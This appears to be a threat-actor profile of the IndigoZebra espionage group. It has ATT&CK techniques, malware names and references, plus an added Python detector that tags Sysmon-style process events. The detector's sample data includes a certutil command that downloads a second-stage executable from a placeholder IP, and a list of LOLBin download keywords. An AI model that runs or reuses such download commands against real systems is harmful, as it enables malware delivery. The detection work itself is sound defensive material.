Introduction
IndigoZebra is a suspected Chinese cyber espionage group that has been targeting Central Asian governments since at least 2014. [3][4][5]
Activities and Tactics
Country of Origin: 🇨🇳 China
Notable Campaigns
Information pending cataloguing.
Tactics, Techniques, and Procedures (TTPs)
- T1583.001 Domains
- T1588.002 Tool
- T1583.006 Web Services
- T1586.002 Email Accounts
- T1566.001 Spearphishing Attachment
- T1204.002 Malicious File
- T1105 Ingress Tool Transfer
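The execution-side techniques in the list above (T1566.001, T1204.002, T1105) leave a recognisable trace in process-creation telemetry. The following is an added example, not code from the original page or from any of the cited vendor reports: it tags constructed Sysmon-style process events with the technique IDs they are evidence for. The field names mirror Sysmon Event ID 1, the attachment-cache path fragment and the download "hint" strings are assumptions to be tuned per fleet, and the sample events are made up.

```python
"""Added example: map constructed process-creation events to the ATT&CK
technique IDs listed for this actor. Not from the original page or any
vendor report; paths, hint strings and events are assumptions."""
import re
from dataclasses import dataclass
from pathlib import PureWindowsPath

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe"}
# Command-line fragments typical of LOLBin downloads (assumed list, tune per fleet).
DOWNLOAD_HINTS = ("-urlcache", "/transfer", "downloadfile", "downloadstring",
                  "invoke-webrequest", "iwr ", "wget ", "curl ")
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
# Folder where Outlook stages attachments that a user opens directly (assumption).
ATTACHMENT_CACHE = "\\content.outlook\\"


@dataclass(frozen=True)
class ProcEvent:
    image: str          # full path of the created process (Sysmon "Image")
    command_line: str   # Sysmon "CommandLine"
    parent_image: str   # Sysmon "ParentImage"


def _basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def classify(ev: ProcEvent) -> list[str]:
    """Return the technique IDs this single event is evidence for, in a fixed order."""
    parent, child = _basename(ev.parent_image), _basename(ev.image)
    cmd = ev.command_line.lower()
    hits: list[str] = []
    # Office opening a document straight out of the Outlook attachment cache:
    # the file arrived by mail (T1566.001) and a user opened it (T1204.002).
    if child in OFFICE_APPS and ATTACHMENT_CACHE in cmd:
        hits += ["T1566.001", "T1204.002"]
    # Office spawning a script host: the opened file executed code (T1204.002).
    if parent in OFFICE_APPS and child in SCRIPT_HOSTS:
        hits.append("T1204.002")
    # A URL plus a download verb on the command line: a tool being pulled in (T1105).
    if URL_RE.search(cmd) and any(h in cmd for h in DOWNLOAD_HINTS):
        hits.append("T1105")
    return list(dict.fromkeys(hits))  # de-duplicate, keep order


def scan(events: list[ProcEvent]) -> dict[int, list[str]]:
    """Index -> technique IDs for every event that matched at least one rule."""
    return {i: t for i, ev in enumerate(events) if (t := classify(ev))}


def observed_techniques(events: list[ProcEvent]) -> set[str]:
    """Which of the listed techniques the event stream shows evidence for."""
    return {t for techs in scan(events).values() for t in techs}


# Constructed sample chain (not from any real incident): attachment opened in Word,
# the document spawns cmd.exe, which uses certutil to fetch a second stage.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
              r'"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" /n '
              r'"C:\Users\u\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\ABC123\invoice.docm"',
              r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE"),
    ProcEvent(r"C:\Windows\System32\cmd.exe",
              r"cmd.exe /c certutil -urlcache -split -f http://203.0.113.7/stage2.exe %TEMP%\s.exe",
              r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"),
    ProcEvent(r"C:\Windows\System32\certutil.exe",
              r"certutil -urlcache -split -f http://203.0.113.7/stage2.exe C:\Users\u\AppData\Local\Temp\s.exe",
              r"C:\Windows\System32\cmd.exe"),
    ProcEvent(r"C:\Windows\System32\notepad.exe", "notepad.exe readme.txt",
              r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for idx, techs in scan(SAMPLE_EVENTS).items():
        print(idx, _basename(SAMPLE_EVENTS[idx].image), techs)
    print("observed:", sorted(observed_techniques(SAMPLE_EVENTS)))
```

Each rule is deliberately narrow and independent, so a single event can carry more than one ID (the cmd.exe child above is both user execution and the start of the tool transfer); correlating the three events by process lineage is what turns the tags into an actual spearphishing-to-download chain.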
Notable Indicators of Compromise (IOCs)
No curated IOCs are currently published for this actor. This section will be updated when stable, attributable indicators are available.
Malware and Tools
- Backdoor.Oldrea
- PoisonIvy
- Unknown Logger
Attribution and Evidence
Country of Origin: China
Additional attribution information pending cataloguing.
References
[1] mitre-attack
[3] HackerNews IndigoZebra July 2021: Lakshmanan, R. (2021, July 1). IndigoZebra APT Hacking Campaign Targets the Afghan Government. Retrieved September 24, 2021.
[4] Checkpoint IndigoZebra July 2021: CheckPoint Research. (2021, July 1). IndigoZebra APT continues to attack Central Asia with evolving tools. Retrieved September 24, 2021.
[5] Securelist APT Trends Q2 2017: Kaspersky Lab's Global Research & Analysis Team. (2017, August 8). APT Trends report Q2 2017. Retrieved February 15, 2018.